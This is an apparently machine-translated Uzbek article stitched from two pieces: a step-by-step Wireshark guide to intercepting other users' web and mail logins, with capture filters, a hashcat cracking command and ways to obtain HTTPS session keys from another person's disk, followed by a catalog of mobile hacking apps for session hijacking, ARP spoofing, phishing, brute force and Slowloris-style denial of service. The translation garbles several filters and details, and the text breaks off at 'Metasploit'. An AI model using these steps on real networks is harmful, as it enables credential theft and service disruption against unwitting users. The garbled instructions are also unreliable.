uy - Yangi boshlanuvchilar uchun
IP orqali cookie fayllarni o'g'irlash uchun dasturlar. Cookie fayllarini o'g'irlash usullari

Ko'pgina foydalanuvchilar yopiq Internet-resursda ro'yxatdan o'tish yoki avtorizatsiya qilishda login va parolni to'ldirish va ENTER tugmasini bosish orqali ushbu ma'lumotlarni osongina ushlab qolish mumkinligini tushunishmaydi. Ko'pincha ular tarmoq orqali himoyalanmagan shaklda uzatiladi. Shuning uchun, agar siz kirmoqchi bo'lgan sayt HTTP protokolidan foydalansa, bu trafikni yozib olish va uni tahlil qilish juda oson. Wireshark yordamida va keyin maxsus filtrlar va dasturlardan foydalanib, parolni toping va shifrini hal qiling.

Parollarni ushlab turish uchun eng yaxshi joy tarmoqning yadrosi bo'lib, u erda barcha foydalanuvchilarning trafigi tashqi resurslarda ro'yxatdan o'tishda Internetga kirish uchun yopiq resurslarga (masalan, pochta) yoki yo'riqnoma oldida ketadi. Biz oynani o'rnatdik va o'zimizni xaker kabi his qilishga tayyormiz.

Qadam 1. Trafikni olish uchun Wireshark-ni o'rnating va ishga tushiring

Ba'zan, buning uchun biz trafikni olishni rejalashtirgan interfeysni tanlash va "Ishga tushirish" tugmasini bosish kifoya. Bizning holatda, biz simsiz tarmoq orqali suratga olamiz.

Trafikni ushlash boshlandi.

2-qadam. Olingan POST trafikini filtrlash

Biz brauzerni ochamiz va foydalanuvchi nomi va parol yordamida ba'zi manbalarga kirishga harakat qilamiz. Avtorizatsiya jarayoni tugallangandan va sayt ochilgandan so'ng, biz Wireshark-da trafikni yozib olishni to'xtatamiz. Keyin, protokol analizatorini oching va ko'p sonli paketlarni ko'ring. Bu yerda ko‘pchilik IT-mutaxassislari bundan keyin nima qilishni bilmasliklari sababli taslim bo‘lishadi. Ammo biz o'z ichiga olgan maxsus paketlarni bilamiz va ularga qiziqamiz POST ma'lumotlari, ular ekranda shaklni to'ldirishda mahalliy mashinamizda hosil qilinadi va manzilga yuboriladi masofaviy server brauzerda "Kirish" yoki "Avtorizatsiya" tugmasini bosganingizda.

Olingan paketlarni ko'rsatish uchun oynaga maxsus filtr kiritamiz: http.iltimos.usul == "POST"

Va biz minglab paketlar o'rniga biz izlayotgan ma'lumotlarga ega faqat bittasini ko'ramiz.

Qadam 3. Foydalanuvchining login va parolini toping

Tezda sichqonchaning o'ng tugmachasini bosing va menyudan elementni tanlang TCP Steam-ni kuzatib boring


Shundan so'ng, sahifaning mazmunini kodda tiklaydigan yangi oynada matn paydo bo'ladi. Keling, parol va foydalanuvchi nomiga mos keladigan "parol" va "foydalanuvchi" maydonlarini topamiz. Ba'zi hollarda ikkala maydon ham oson o'qilishi mumkin va hatto shifrlanmaydi, lekin agar biz Mail.ru, Facebook, VKontakte va boshqalar kabi juda mashhur manbalarga kirishda trafikni qo'lga kiritishga harakat qilsak, parol shifrlangan bo'ladi:

HTTP/1.1 302 topildi

Server: Apache/2.2.15 (CentOS)

X-Powered-by: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR Otro STP IND DEM"

Set-Cookie: parol = ; tugaydi=Ps, 07-noyabr 2024-yil 23:52:21 GMT; yo'l=/

Manzil: loggedin.php

Tarkib uzunligi: 0

Ulanish: yopish

Kontent turi: matn/html; charset=UTF-8

Shunday qilib, bizning holatlarimizda:

Foydalanuvchi nomi: networkguru

Parol:

Qadam 4. Parolni parolini ochish uchun kodlash turini aniqlang

Masalan, http://www.onlinehashcrack.com/hash-identification.php#res veb-saytiga o'ting va identifikatsiya oynasida parolimizni kiriting. Menga ustuvorlik tartibida kodlash protokollari ro'yxati berildi:

Qadam 5. Foydalanuvchi parolini dekodlash

Yoniq bu bosqichda hashcat yordam dasturidan foydalanishimiz mumkin:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Chiqishda biz shifrlangan parolni oldik: simplepassword

Shunday qilib, Wireshark yordamida biz nafaqat ilovalar va xizmatlarning ishlashidagi muammolarni hal qila olamiz, balki o'zimizni xaker sifatida sinab ko'ramiz, foydalanuvchilar veb-shakllarga kiritadigan parollarni tutib olamiz. Bundan tashqari, ko'rsatish uchun oddiy filtrlar yordamida foydalanuvchi pochta qutilari uchun parollarni topishingiz mumkin:

  • POP protokoli va filtri quyidagicha ko'rinadi: pop.request.command == "USER" || pop.request.command == "PASS"
  • IMAP protokoli va filtri quyidagicha bo'ladi: imap.request "login" ni o'z ichiga oladi
  • Protokol SMTP bo'lib, siz quyidagi filtrni kiritishingiz kerak bo'ladi: smtp.req.command == "AUTH"

va kodlash protokolini dekodlash uchun jiddiyroq yordamchi dasturlar.

6-qadam: Agar trafik shifrlangan bo'lsa va HTTPS dan foydalansa nima bo'ladi?

Bu savolga javob berish uchun bir nechta variant mavjud.

Variant 1. Foydalanuvchi va server o'rtasidagi aloqa uzilganda ulaning va ulanish o'rnatilgan vaqtda trafikni yozib oling (SSL Handshake). Ulanish o'rnatilganda, seans kaliti ushlanishi mumkin.

Variant 2: Firefox yoki Chrome tomonidan yozib olingan seans kaliti jurnali fayli yordamida HTTPS trafigining shifrini ochishingiz mumkin. Buning uchun brauzer ushbu shifrlash kalitlarini jurnal fayliga yozish uchun sozlanishi kerak (FireFox asosidagi misol) va siz ushbu jurnal faylini olishingiz kerak. Asosan, siz seans kaliti faylini o'g'irlashingiz kerak qattiq disk boshqa foydalanuvchi (bu noqonuniy). Xo'sh, keyin trafikni yozib oling va uni shifrlash uchun olingan kalitdan foydalaning.

Aniqlash. Biz parolini o'g'irlamoqchi bo'lgan shaxsning veb-brauzeri haqida gapiramiz. Agar biz o'z HTTPS trafikimizni shifrlashni nazarda tutsak va mashq qilmoqchi bo'lsak, bu strategiya ishlaydi. Agar siz boshqa foydalanuvchilarning HTTPS trafigini ularning kompyuterlariga kirmasdan shifrlamoqchi bo'lsangiz, bu ishlamaydi - bu ham shifrlash, ham maxfiylik.

1 yoki 2-variantga muvofiq kalitlarni olganingizdan so'ng ularni WireShark-da ro'yxatdan o'tkazishingiz kerak:

  1. Tahrirlash - Afzalliklar - Protokollar - SSL menyusiga o'ting.
  2. "Bir nechta TCP segmentlarini qamrab olgan SSL yozuvlarini qayta yig'ish" bayrog'ini o'rnating.
  3. "RSA kalitlari ro'yxati" va "Tahrirlash" ni bosing.
  4. Barcha maydonlarga ma'lumotlarni kiriting va kalit bilan faylga yo'lni yozing

“Xakerlik vositalariga ega smartfonmi? Bunday narsa yo'q, - biz sizga yaqinda aytgan bo'lardik. Hujumlarni amalga oshirish uchun odatiy vositalarni faqat ba'zi Maemo-da ishga tushirish mumkin edi. Endi ko'plab tanish vositalar iOS va Android-ga ko'chirildi va ba'zi hack-vositalari mobil muhit uchun maxsus yozilgan. Penetratsion testlarda smartfon noutbukni almashtira oladimi? Biz buni tekshirishga qaror qildik.

ANDROID

Android nafaqat odamlar uchun, balki to'g'ri odamlar uchun ham mashhur platformadir. Bu yerda foydali ][-utilitalar soni oddiygina jadvaldan tashqarida. Buning uchun tizimning UNIX ildizlariga rahmat aytishimiz mumkin - bu ko'plab vositalarni Android-ga ko'chirishni sezilarli darajada soddalashtirdi. Afsuski, Google ulardan ba'zilarini Play Store-ga kirishga ruxsat bermaydi, shuning uchun siz tegishli APK-ni qo'lda o'rnatishingiz kerak bo'ladi. Bundan tashqari, ba'zi yordamchi dasturlar tizimga maksimal kirishni talab qiladi (masalan, iptables xavfsizlik devori), shuning uchun siz ildizga kirish haqida oldindan g'amxo'rlik qilishingiz kerak. Bu erda har bir ishlab chiqaruvchi o'z texnologiyasidan foydalanadi, ammo kerakli ko'rsatmalarni topish juda oson. Yaxshi HOWTO to'plami LifeHacker resursi (bit.ly/eWgDlu) tomonidan to'plangan. Ammo, agar siz bu erda ma'lum bir modelni topa olmasangiz, XDA-Developers forumi (www.xda-developers.com) har doim yordamga keladi, bu erda siz Android telefonining deyarli har qanday modelida turli xil ma'lumotlarni topishingiz mumkin. Qanday bo'lmasin, quyida tavsiflangan ba'zi yordam dasturlari ildizga kirishsiz ishlaydi.

Paket menejeri

BotBrew Ko'rib chiqishni noodatiy paket menejeri bilan boshlaylik. Ishlab chiquvchilar buni "superuserlar uchun yordamchi dasturlar" deb atashadi va bu haqiqatdan uzoq emas. BotBrew-ni o'rnatganingizdan so'ng, siz Android uchun tuzilgan juda ko'p tanish vositalarni yuklab olishingiz mumkin bo'lgan omborga ega bo'lasiz. Ular orasida: ularda yozilgan ko'plab vositalarni ishga tushirish uchun Python va Ruby tarjimonlari, tarmoqni tahlil qilish uchun tcpdump sniffer va Nmap skaneri, versiyalarni boshqarish tizimlari bilan ishlash uchun Git va Subversion va boshqalar.

Tarmoq skanerlari

PIPS Noutbukdan farqli o'laroq, cho'ntagiga osongina sig'adigan va hech qachon shubha tug'dirmaydigan ko'zga tashlanmaydigan smartfon tarmoqni o'rganish uchun foydali bo'lishi mumkin. Yuqorida Nmap-ni qanday o'rnatishingiz mumkinligini aytdik, ammo boshqa variant ham bor. PIPS - bu norasmiy bo'lsa-da, Android uchun maxsus moslashtirilgan Nmap skanerining porti. Bu shuni anglatadiki, siz tarmoqdagi faol qurilmalarni tezda topishingiz, barmoq izlari opsiyalari yordamida ularning operatsion tizimini aniqlashingiz, portni skanerlashni amalga oshirishingiz - qisqasi, Nmap qila oladigan hamma narsani qilishingiz mumkin. Fing Nmap-ning barcha kuchiga qaramay, foydalanishda ikkita muammo bor. Birinchidan, skanerlash parametrlari ishga tushirish tugmachalari orqali uzatiladi, siz ularni nafaqat bilishingiz, balki noqulayliklar bilan ham kiritishingiz kerak. mobil klaviatura. Ikkinchidan, konsol chiqishidagi skanerlash natijalari biz xohlagan darajada aniq emas. Fing skanerida bunday kamchiliklar mavjud emas, u tarmoqni juda tez skanerlaydi, barmoq izlarini oladi va keyin barcha mavjud qurilmalar ro'yxatini aniq ko'rinishda ko'rsatadi, ularni turlari bo'yicha (router, ish stoli, iPhone va boshqalar) ajratadi. Shu bilan birga, har bir xost uchun ochiq portlar ro'yxatini tezda ko'rishingiz mumkin. Bundan tashqari, shu yerdan siz tizimda o'rnatilgan FTP mijozidan foydalanib, FTP-ga ulanishingiz mumkin - juda qulay. NetAudit Muayyan xostni tahlil qilish haqida gap ketganda, NetAudit yordam dasturi ajralmas bo'lishi mumkin. U har qanday Android qurilmasida (hatto ildiz olmagan) ishlaydi va nafaqat tarmoqdagi qurilmalarni tezda aniqlash, balki ularni aniqlash uchun katta barmoq izlari bazasi yordamida ularni tekshirish imkonini beradi. operatsion tizim, shuningdek, veb-serverda ishlatiladigan CMS tizimlari. Hozirda maʼlumotlar bazasida 3000 dan ortiq raqamli barmoq izlari mavjud. Net vositalari Agar, aksincha, siz pastroq darajada ishlashingiz va tarmoqning ishlashini diqqat bilan tekshirishingiz kerak bo'lsa, unda siz Net Toolssiz qilolmaysiz. Bu ishda ajralmas hisoblanadi tizim administratori qurilma ulangan tarmoqning ishlashini to'liq diagnostika qilish imkonini beruvchi yordamchi dasturlar to'plami. Paketda ping, traceroute, arp, dns, netstat, route kabi 15 dan ortiq turli xil dasturlar mavjud.

Yo'l harakati manipulyatsiyasi

Root uchun shark Tcpdump-ga asoslangan sniffer barcha ma'lumotlarni pcap fayliga halollik bilan kiritadi, keyin ularni Wireshark yoki Network Miner kabi tanish yordamchi dasturlar yordamida o'rganish mumkin. Unda MITM hujumlari uchun imkoniyatlar amalga oshirilmaganligi sababli, bu sizning trafikingizni tahlil qilish uchun vositadir. Misol uchun, bu shubhali omborlardan qurilmangizga o'rnatilgan dasturlar qanday uzatilishini o'rganishning ajoyib usuli. FaceNiff Agar biz Android uchun jangovar ilovalar haqida gapiradigan bo'lsak, unda eng shov-shuvlilaridan biri bu FaceNiff bo'lib, u ushlangan veb-sessiyalarga ushlash va kiritishni amalga oshiradi. Dastur bilan APK to'plamini yuklab olib, siz ushbu buzish vositasini deyarli har qanday Android smartfonida ishga tushirishingiz va simsiz tarmoqqa ulanish orqali turli xizmatlarning hisoblarini to'sib qo'yishingiz mumkin: Facebook, Twitter, VKontakte va boshqalar - o'ndan ortiq. jami. Seansni o'g'irlash ARP spoofing hujumi yordamida amalga oshiriladi, ammo hujum faqat himoyalanmagan ulanishlarda mumkin (FaceNiff SSL trafigiga singib keta olmaydi). Skriptlar oqimini cheklash uchun muallif maksimal seanslar sonini uchtagacha cheklab qo'ydi - keyin maxsus faollashtirish kodini olish uchun ishlab chiquvchiga murojaat qilishingiz kerak. DroidSheep Agar FaceNiff yaratuvchisi undan foydalanish uchun pul talab qilsa, DroidSheep xuddi shu funksiyaga ega mutlaqo bepul vositadir. To'g'ri, siz rasmiy veb-saytda tarqatish to'plamini topa olmaysiz (bu Germaniyaning xavfsizlik kommunal xizmatlariga nisbatan qattiq qonunlari bilan bog'liq), lekin uni Internetda hech qanday muammosiz topish mumkin. Yordamchi dasturning asosiy vazifasi foydalanuvchilarning mashhur veb-sessiyalarini ushlab turishdir ijtimoiy tarmoqlar, bir xil ARP Spoofing yordamida amalga oshirilgan. Lekin bilan xavfsiz ulanishlar muammo: FaceNiff kabi, DroidSheep HTTPS protokoli bilan ishlashni qat'iyan rad etadi. Tarmoq spoofer Ushbu yordam dasturi, shuningdek, ochiq simsiz tarmoqlarning ishonchsizligini ko'rsatadi, lekin biroz boshqacha darajada. U foydalanuvchi seanslarini to'xtatmaydi, lekin HTTP trafigini spoofing hujumi yordamida o'zi orqali o'tishiga imkon beradi va u bilan belgilangan manipulyatsiyalarni amalga oshiradi. Oddiy hazillardan boshlab (saytdagi barcha rasmlarni trollfeyslar bilan almashtirish, barcha rasmlarni aylantirish yoki, aytaylik, Google natijalarini almashtirish) va foydalanuvchiga facebook.com, linkedin kabi mashhur xizmatlarning soxta sahifalari berilganda fishing hujumlari bilan yakunlanadi. .com, vkontakte.ru va boshqalar. Anti (zImperium LTD tomonidan Android Network Toolkit)
Agar siz Android uchun qaysi hack yordam dasturi eng kuchli ekanligini so'rasangiz, Anti-ning raqobatchilari yo'q. Bu haqiqiy xaker kombinati. Dasturning asosiy vazifasi tarmoq perimetrini skanerlashdan iborat. Keyinchalik, jangga turli xil modullar kiradi, ularning yordamida butun arsenal amalga oshiriladi: trafikni tinglash, MITM hujumlarini amalga oshirish va topilgan zaifliklardan foydalanish. To'g'ri, kamchiliklari ham bor. Sizning e'tiboringizni tortadigan birinchi narsa shundaki, zaifliklardan foydalanish faqat Internetda joylashgan markaziy dastur serveridan amalga oshiriladi, buning natijasida tashqi IP-manzilga ega bo'lmagan maqsadlarni unutish mumkin.

Trafik tunnellari

Umumiy qo'mondon Taniqli fayl menejeri Endi smartfonlarda! Ish stoli versiyasida bo'lgani kabi, turli xil tarmoq kataloglariga ulanish uchun plaginlar tizimi, shuningdek, kanonik ikki panelli rejim mavjud - ayniqsa planshetlarda qulay. SSH tunnel Yaxshi, lekin ochiq simsiz tarmoq orqali uzatiladigan ma'lumotlaringiz xavfsizligini qanday ta'minlash mumkin? Android qutidan tashqarida qo'llab-quvvatlaydigan VPN-ga qo'shimcha ravishda siz SSH tunnelini yaratishingiz mumkin. Shu maqsadda SSH Tunnelning ajoyib yordam dasturi mavjud bo'lib, u tanlangan ilovalarning yoki butun tizimning trafigini masofaviy SSH serveri orqali yo'naltirish imkonini beradi. ProxyDroid Ko'pincha proksi yoki SOX orqali trafikni yuborish kerak bo'ladi va bu holda ProxyDroid yordam beradi. Hammasi oddiy: siz qaysi dastur trafigini tunnel qilishni tanlaysiz va proksi-serverni belgilaysiz (HTTP/HTTPS/SOCKS4/SOCKS5 qo'llab-quvvatlanadi). Agar avtorizatsiya zarur bo'lsa, ProxyDroid ham buni qo'llab-quvvatlaydi. Aytgancha, konfiguratsiya ma'lum biriga bog'lanishi mumkin simsiz tarmoq, qilgan turli xil sozlamalar ularning har biri uchun.

Simsiz tarmoq

Wifi Analyzer O'rnatilgan simsiz tarmoq menejeri juda ma'lumotli emas. Agar siz tezda yaqin atrofdagi kirish nuqtalarining to'liq rasmini olishingiz kerak bo'lsa, Wifi Analyzer yordam dasturi ajoyib tanlovdir. U nafaqat yaqin atrofdagi barcha kirish nuqtalarini ko'rsatadi, balki ular ishlaydigan kanalni, ularning MAC manzilini va eng muhimi, ishlatiladigan shifrlash turini ham ko'rsatadi ("WEP" orzu qilingan harflarni ko'rib, biz kirishni taxmin qilishimiz mumkin xavfsiz tarmoq taqdim etiladi). Bunga qo'shimcha ravishda, vizual signal kuchi ko'rsatkichi tufayli kerakli kirish nuqtasi jismonan qaerdaligini topish kerak bo'lsa, yordam dasturi idealdir. WiFiKill Ushbu yordamchi dastur, ishlab chiquvchining ta'kidlashicha, simsiz tarmoq butun kanaldan foydalanadigan mijozlar bilan to'ldirilganda foydali bo'lishi mumkin va aynan shu vaqtda sizga kerak bo'ladi. yaxshi aloqa va barqaror ulanish. WiFiKill mijozlarni tanlab yoki ma'lum bir mezon asosida Internetdan uzish imkonini beradi (masalan, Yablokoning barcha a'zolarini masxara qilish mumkin). Dastur shunchaki ARP spoofing hujumini amalga oshiradi va barcha mijozlarni o'zlariga yo'naltiradi. Ushbu algoritm ahmoqona oddiygina iptables asosida amalga oshiriladi. Bu tez ovqatlanish simsiz tarmoqlari uchun boshqaruv paneli :).

Veb-ilovalarni tekshirish

HTTP so'rovlar yaratuvchisi Kompyuterdan HTTP so'rovlarini boshqarish - bu oddiy narsa, buning uchun juda ko'p yordamchi dasturlar va brauzer plaginlari mavjud. Smartfonga kelsak, hamma narsa biroz murakkabroq. HTTP Query Builder sizga kerakli parametrlar bilan maxsus HTTP so'rovini yuborishga yordam beradi, masalan, kerakli cookie yoki o'zgartirilgan User-Agent. So'rov natijasi standart brauzerda ko'rsatiladi. Router Brute Force ADS 2 Agar sayt asosiy kirish autentifikatsiyasi yordamida parol bilan himoyalangan bo'lsa, u holda uning ishonchliligini Router Brute Force ADS 2 yordam dasturidan foydalanib tekshirishingiz mumkin.Dastlab, yordamchi dastur router administrator panelida parollarni qo'pol kuch ishlatish uchun yaratilgan, ammo bu aniq bo'lishi mumkin. shunga o'xshash himoya bilan boshqa har qanday manbaga qarshi ishlatiladi. Yordamchi dastur ishlaydi, lekin aniq xom. Misol uchun, ishlab chiquvchi qo'pol kuchni ta'minlamaydi, faqat lug'at yordamida qo'pol kuch ishlatadi. AndDOSid Albatta, siz Slowloris kabi veb-serverlarni o'chirish uchun shov-shuvli dastur haqida eshitgansiz. Uning ishlash printsipi uzoq veb-server bilan maksimal ulanishlar sonini yaratish va ushlab turish, shu bilan yangi mijozlarning unga ulanishiga yo'l qo'ymaslikdir. Shunday qilib, AnDOSid - bu sizning Android qurilmangizdagi Slowlorisning analogidir! Men sizga bir sirni aytaman, ikki yuzta ulanishni ta'minlash uchun etarli beqaror ish Apache veb-serverida ishlaydigan to'rtta veb-saytdan biri. Va bularning barchasi - telefoningizdan!

Har xil kommunal xizmatlar

Kodlash Ko'pgina veb-ilovalar bilan ishlash va ularning mantig'ini tahlil qilishda kodlangan shaklda uzatiladigan ma'lumotlarga, ya'ni Base64-ga duch kelish odatiy holdir. Encode sizga ushbu ma'lumotlarni dekodlashda yordam beradi va unda aniq nima saqlanganligini ko'ring. Ehtimol, tirnoqlarni almashtirish, ularni Base64-ga qayta kodlash va ularni o'zingiz tadqiq qilayotgan saytning URL-manziliga almashtirish orqali siz ma'lumotlar bazasi so'rovi xatosini olasiz. Agar kerak bo'lsa, HexEditor hex muharriri, keyin u Android uchun ham mavjud. HexEditor yordamida har qanday fayllarni, shu jumladan tizim fayllarini tahrirlashingiz mumkin, agar siz dasturning super foydalanuvchiga huquqlarini oshirsangiz. Kerakli matn qismini osongina topish va uni o'zgartirish imkonini beruvchi standart matn muharririning ajoyib o'rnini bosadi.

Masofaviy kirish

ConnectBot kirgan masofaviy xostga, siz undan foydalana olishingiz kerak. Va buning uchun bizga mijozlar kerak. SSH bilan boshlaylik, bu erda ConnectBot allaqachon de-fakto standartdir. Bundan tashqari foydalanuvchilar uchun qulay interfeys, SSH ulanishlari orqali xavfsiz tunnellarni tashkil qilish imkoniyatini beradi. PocketCloud Remote RDP/VNC RDP yoki VNC xizmatlari orqali masofaviy ish stoliga ulanish imkonini beruvchi foydali dastur. Bular bitta mijoz ekanligidan juda xursandman, RDP va VNC uchun turli vositalardan foydalanishning hojati yo'q. SNMP MIB brauzeri uchun maxsus yozilgan Android brauzeri MIB, uning yordamida siz tarmoq qurilmalarini boshqarishingiz mumkin SNMP protokoli. Bu turli marshrutizatorlarda hujum vektorini ishlab chiqish uchun foydali bo'lishi mumkin, chunki SNMP orqali boshqarish uchun standart hamjamiyat qatori (boshqacha aytganda, kirish paroli) hali bekor qilinmagan.

iOS

iOS platformasi xavfsizlik yordam dasturini ishlab chiquvchilar orasida mashhur emas. Ammo agar bo'lsa Android huquqlari Root faqat ba'zi ilovalar uchun kerak bo'lsa-da, jailbreak deyarli har doim Apple qurilmalarida talab qilinadi. Yaxshiyamki, hatto eng so'nggi iDevices proshivkasi uchun (5.1.1) allaqachon jailbreak vositasi mavjud. To'liq kirish bilan bir qatorda siz ko'plab yordamchi dasturlarni o'z ichiga olgan Cydia muqobil ilovalar menejeriga ega bo'lasiz.

Tizim bilan ishlash

MobileTerminal Men boshlashni istagan birinchi narsa - terminalni o'rnatish. Aniq sabablarga ko'ra, u mobil operatsion tizimning standart yetkazib berish tarkibiga kiritilmagan, ammo biz bundan keyin muhokama qiladigan konsol yordam dasturlarini ishga tushirish uchun kerak bo'ladi. Terminal emulyatorining eng yaxshi ilovasi MobileTerminal - u bir nechta terminallarni, boshqaruv imo-ishoralarini qo'llab-quvvatlaydi (masalan, Control-C-ni yuborish uchun) va umuman o'ylanganligi bilan hayratlanarli. iSSH Yana bir, yana qiyin variant qurilma konsoliga kirish huquqiga ega bo'ling - unga OpenSSH-ni o'rnating (bu Cydia orqali amalga oshiriladi) va unga SSH mijozi orqali mahalliy ulaning. Agar siz ajoyib sensorli ekran boshqaruviga ega bo'lgan iSSH kabi to'g'ri mijozdan foydalansangiz, bu usul MobileTerminal-dan foydalanishdan ham qulayroqdir.

Ma'lumotlarni ushlash

Pirni va Pirni Pro Endi siz konsolga kirish imkoniga ega bo'lsangiz, yordam dasturlarini sinab ko'rishingiz mumkin. Keling, tarixga iOS uchun to‘laqonli sniffer sifatida kirgan Pirni bilan boshlaylik. Afsuski, qurilmaga o'rnatilgan tizimli ravishda cheklangan Wi-Fi modulini oddiy ma'lumotlarni ushlab turish uchun zarur bo'lgan nopok rejimga o'tkazib bo'lmaydi. Shunday qilib, ma'lumotlarni ushlab turish uchun klassik ARP spoofing qo'llaniladi, uning yordamida barcha trafik qurilmaning o'zi orqali o'tadi. Yordamchi dasturning standart versiyasi konsoldan ishga tushiriladi, bu erda MITM hujum parametrlariga qo'shimcha ravishda, barcha trafik qayd etilgan PCAP faylining nomi ko'rsatilgan. Yordamchi dastur yanada rivojlangan versiyaga ega - Pirni Pro, u grafik interfeysga ega. Bundan tashqari, u tezda HTTP trafigini tahlil qilishi va hatto u erdan qiziqarli ma'lumotlarni (masalan, login va parollar) avtomatik ravishda tortib olishi mumkin. muntazam iboralar, ular sozlamalarda o'rnatiladi. Intercepter-NG (konsol nashri) Biz bir necha bor yozgan taniqli sniffer Intercepter-NG yaqinda konsol versiyasiga ega bo'ldi. Muallif aytganidek, kodning aksariyati sof ANSI C-da yozilgan bo'lib, u deyarli har qanday muhitda bir xil ishlaydi, shuning uchun konsol versiyasi boshidan ish stoli Windows, Linux va BSD-da, shuningdek mobil platformalarda, shu jumladan iOS-da ishlagan. va Android. Konsol versiyasi allaqachon turli xil protokollar orqali uzatiladigan parollarni ushlash, messenjer xabarlarini (ICQ/Jabber va boshqa ko'plab) ushlab turish, shuningdek, trafikdan fayllarni tiklash (HTTP/FTP/IMAP/POP3/SMTP/SMB)ni allaqachon amalga oshiradi. Shu bilan birga, tarmoqni skanerlash funktsiyalari va yuqori sifatli ARP Poison mavjud. To'g'ri ishlash uchun avval Cydia orqali libpcap paketini o'rnatishingiz kerak (sozlamalarda ishlab chiqish paketlarini yoqishni unutmang). Barcha ishga tushirish ko'rsatmalari to'g'ri huquqlarni o'rnatish uchun qaynatiladi: chmod +x intercepter_ios. Keyinchalik, agar siz snifferni parametrlarsiz ishga tushirsangiz, har qanday hujumlarni boshlash imkonini beruvchi aniq interaktiv Itercepter interfeysi paydo bo'ladi. Ettercap-NG Bunga ishonish qiyin, ammo MITM hujumlarini amalga oshirish uchun bu murakkab vosita nihoyat iOS-ga ko'chirildi. Katta hajmdagi ishlardan so'ng biz to'liq huquqli mobil portni yaratishga muvaffaq bo'ldik. O'z-o'zini kompilyatsiya qilish paytida bog'liqliklar atrofida daf bilan raqsga tushishdan xalos bo'lish uchun ma'lumotlar manbai sifatida theworm.altervista.org/cydia (TWRepo ombori) ni qo'shgandan so'ng, Cydia-dan foydalanib allaqachon qurilgan paketni o'rnatish yaxshiroqdir. IN kiritilgan va etterlog yordam dasturi, bu to'plangan trafik chiqindilaridan har xil turdagi foydali ma'lumotlarni olishda yordam beradi (masalan, FTP kirish hisoblari).

Simsiz tarmoq tahlili

WiFi analizator Eskida iOS versiyalari hunarmandlar aircrack yugurib, WEP kalitini buzishi mumkin edi, lekin biz tekshirdik: dastur yangi qurilmalarda ishlamaydi. Shuning uchun, Wi-Fi-ni o'rganish uchun biz faqat Wi-Fi skanerlari bilan kifoyalanishimiz kerak. WiFi analizator Atrofdagi barcha mavjud 802.11 tarmoqlari, jumladan SSID, kanallar, ishlab chiqaruvchilar, MAC manzillari va shifrlash turlari haqidagi ma'lumotlarni tahlil qiladi va ko'rsatadi. Yordamchi dastur efirdagi ma'lumotlar asosida real vaqtda vizual grafiklarni yaratadi. Bunday dastur bilan siz uni birdan unutib qo'ysangiz, nuqtaning jismoniy joyini topish oson va, masalan, ulanish uchun foydali bo'lishi mumkin bo'lgan WPS PIN-kodiga qarang.

Tarmoq skanerlari

Scany Maqsad va vazifalardan qat'i nazar, dunyoning istalgan nuqtasida pentester qaysi dasturdan foydalanadi? Tarmoq skaneri. Va iOS holatida, bu, ehtimol, eng kuchli Scany asboblar to'plami bo'ladi. O'rnatilgan yordamchi dasturlar to'plami tufayli siz tezda batafsil rasmga ega bo'lishingiz mumkin tarmoq qurilmalari oh va, masalan, ochiq portlar. Bundan tashqari, paketga ping, traceroute, nslookup kabi tarmoq sinovi utilitlari kiradi. Fing Biroq, ko'p odamlar Fingni afzal ko'rishadi. Skaner juda oddiy va cheklangan funksionallikka ega, ammo bu, masalan, kafeterya tarmog'i bilan birinchi tanishish uchun etarli :). Natijalar skanerlangan tarmoqqa ulangan masofaviy mashinalar, MAC manzillari va xost nomlaridagi mavjud xizmatlar haqidagi ma'lumotlarni ko'rsatadi. Nikto Nikto haqida hamma unutganga o'xshaydi, lekin nega? Axir, siz Cydia orqali skript tilida (ya'ni Perl) yozilgan ushbu veb-zaiflik skanerini osongina o'rnatishingiz mumkin. Bu shuni anglatadiki, siz uni terminaldan jailbroken qurilmangizda osongina ishga tushirishingiz mumkin. Nikto sizni ta'minlashdan xursand bo'ladi Qo'shimcha ma'lumot sinovdan o'tgan veb-resursda. Bundan tashqari, siz o'z qo'llaringiz bilan uning ma'lumotlar bazasiga o'zingizning qidiruv imzolaringizni qo'shishingiz mumkin. sqlmap Bu kuchli vosita SQL zaifliklaridan avtomatik foydalanish uchun u Python tilida yozilgan, ya'ni tarjimonni o'rnatganingizdan so'ng uni to'g'ridan-to'g'ri mobil qurilmangizdan osongina ishlatishingiz mumkin.

Masofaviy boshqarish

SNMP skanerlash Ko'pgina tarmoq qurilmalari (shu jumladan qimmat marshrutizatorlar) SNMP protokoli yordamida boshqariladi. Ushbu yordam dasturi oldindan ma'lum bo'lgan hamjamiyat satri qiymatlari (boshqacha aytganda, standart parollar) bilan mavjud SNMP xizmatlari uchun pastki tarmoqlarni skanerlash imkonini beradi. E'tibor bering, qurilma boshqaruviga kirish uchun standart hamjamiyat satrlari (davlat/xususiy) bilan SNMP xizmatlarini qidirish perimetrning o'zini aniqlash va xizmatlarni aniqlash bilan birga har qanday kirish testining ajralmas qismi hisoblanadi. iTap mobil RDP / iTap mobil VNC Xuddi shu ishlab chiqaruvchining ikkita yordamchi dasturi RDP va VNC protokollari yordamida masofaviy ish stoliga ulanish uchun mo'ljallangan. Shu kabi yordamchi dasturlar Uskunalar Do'koni Ularning ko'plari bor, lekin ulardan foydalanish ayniqsa qulaydir.

Parolni tiklash

Gidra Dunyo bo'ylab millionlab xakerlarga o'z parollarini "eslab qolish"ga yordam beradigan afsonaviy dastur iOS-ga ko'chirildi. Endi siz HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 va boshqa ko'plab xizmatlar uchun parollarni to'g'ridan-to'g'ri iPhone'ingizdan qidirishingiz mumkin. To'g'ri, yanada samarali hujum qilish uchun yaxshi qo'pol kuch lug'atlarini to'plash yaxshiroqdir. Muledan o'tish Har bir inson foydalanishning zaifligini oldindan biladi standart parollar. Pass Mule - tarmoq qurilmalari uchun barcha turdagi standart login va parollarni o'z ichiga olgan katalog turi. Ular sotuvchining nomi, mahsuloti va modeli bo'yicha qulay tarzda tashkil etilgan, shuning uchun sizga kerakli narsani topish qiyin bo'lmaydi. Dastur yo'riqnoma uchun qo'llanma, standart login va parolni topish uchun vaqtni tejash uchun mo'ljallangan.

Zaifliklardan foydalanish

Metasploit
